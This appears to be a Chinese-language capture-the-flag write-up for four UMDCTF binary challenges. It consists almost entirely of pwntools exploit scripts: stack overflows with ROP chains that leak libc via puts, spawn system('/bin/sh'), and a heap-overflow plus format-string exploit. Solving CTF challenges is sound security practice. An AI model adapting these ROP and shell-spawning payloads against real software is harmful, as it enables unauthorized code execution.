Jump_Not_Easy

 1 from pwn import *
 2 
 3 p = process('./pwn')
 4 elf = ELF('./pwn')
 5 context.log_level = 'debug'
 6 
 7 def duan():
 8     gdb.attach(p)
 9     pause()
10 
11 payload = 'a'*0x40+'bbbbbbbb'+p64(0x040125D)
12 p.sendlineafter('go?
',payload)
13 p.recv()

Jump_Is_Easy

　　system怎么也打不通，加了个ret才打通，估计又是栈对齐的问题(猜的)。

 1 from pwn import *
 2 from LibcSearcher import *
 3 
 4 p = process('./pwn')
 5 elf = ELF('./pwn')
 6 context.log_level = 'debug'
 7 
 8 def duan():
 9     gdb.attach(p)
10     pause()
11 
12 pop_rdi = 0x004012c3
13 ret = 0x0040101a
14 fun_got = elf.got['__libc_start_main']
15 puts_plt = elf.plt['puts']
16 main = elf.symbols['main']
17 
18 payload = 'a'*0x40+'bbbbbbbb'
19 payload+= p64(pop_rdi)+p64(fun_got)
20 payload+= p64(puts_plt)+p64(main)
21 
22 p.sendlineafter('go?
',payload)
23 fun_addr = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00'))
24 libc = LibcSearcher("__libc_start_main", fun_addr)
25 libc_base = fun_addr-libc.dump("__libc_start_main")    
26 system = libc_base+libc.dump("system")
27 binsh = libc_base+libc.dump("str_bin_sh")
28 print 'system-->'+hex(system)
29 print 'binsh-->'+hex(binsh)
30 print 'libc_base-->'+hex(libc_base)
31 
32 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
33 p.sendlineafter('go?
',payload)
34 p.interactive()

Jump_Not_Working

　　感觉和上一题一样...

 1 from pwn import *
 2 from LibcSearcher import *
 3 
 4 p = process('./pwn')
 5 p = remote('chals5.umdctf.io',7004)
 6 elf = ELF('./pwn')
 7 context.log_level = 'debug'
 8 
 9 def duan():
10     gdb.attach(p)
11     pause()
12 
13 pop_rdi = 0x004012c3
14 ret = 0x0040101a
15 fun_got = elf.got['__libc_start_main']
16 puts_plt = elf.plt['puts']
17 main = elf.symbols['main']
18 
19 payload = 'a'*0x40+'bbbbbbbb'
20 payload+= p64(pop_rdi)+p64(fun_got)
21 payload+= p64(puts_plt)+p64(main)
22 
23 p.sendlineafter('go?
',payload)
24 fun_addr = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00'))
25 libc = LibcSearcher("__libc_start_main", fun_addr)
26 libc_base = fun_addr-libc.dump("__libc_start_main")    
27 system = libc_base+libc.dump("system")
28 binsh = libc_base+libc.dump("str_bin_sh")
29 print 'system-->'+hex(system)
30 print 'binsh-->'+hex(binsh)
31 print 'libc_base-->'+hex(libc_base)
32 
33 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(system)
34 p.sendlineafter('go?
',payload)
35 p.interactive()

Jump_Is_Found

　　堆溢出＋格式化字符串漏洞，不知道为什么打不了got表。仔细分析代码就可以出。

 1 from pwn import *
 2 from LibcSearcher import *
 3 
 4 p = process('./pwn')
 5 elf = ELF('./pwn')
 6 context(os='linux',arch='amd64',log_level='debug')
 7 
 8 def duan():
 9     gdb.attach(p)
10     pause()
11 
12 payload = 'a'*0x100+p64(0)+p64(0x111)+'%51$p'
13 p.sendlineafter('CONSOLE> ',payload)
14 p.recvuntil('location: ')
15 fun_got = int(p.recv(14),16)-231
16 
17 libc = LibcSearcher("__libc_start_main",fun_got)
18 libc_base = fun_got-libc.dump("__libc_start_main")    
19 system = libc_base+libc.dump("system")
20 binsh = libc_base+libc.dump("str_bin_sh")
21 print 'libc_base-->'+hex(libc_base)
22 print 'system-->'+hex(system)
23 
24 payload = '1'.ljust(0x100,'a')+p64(0)+p64(0x111)+'/bin/shx00'.ljust(0x100,'a')+p64(0)+p64(0x21)+p64(system)*3
25 p.sendlineafter('CONSOLE> ',payload)
26 p.interactive()

总结

　　第一次做国外的比赛，感觉还算友好。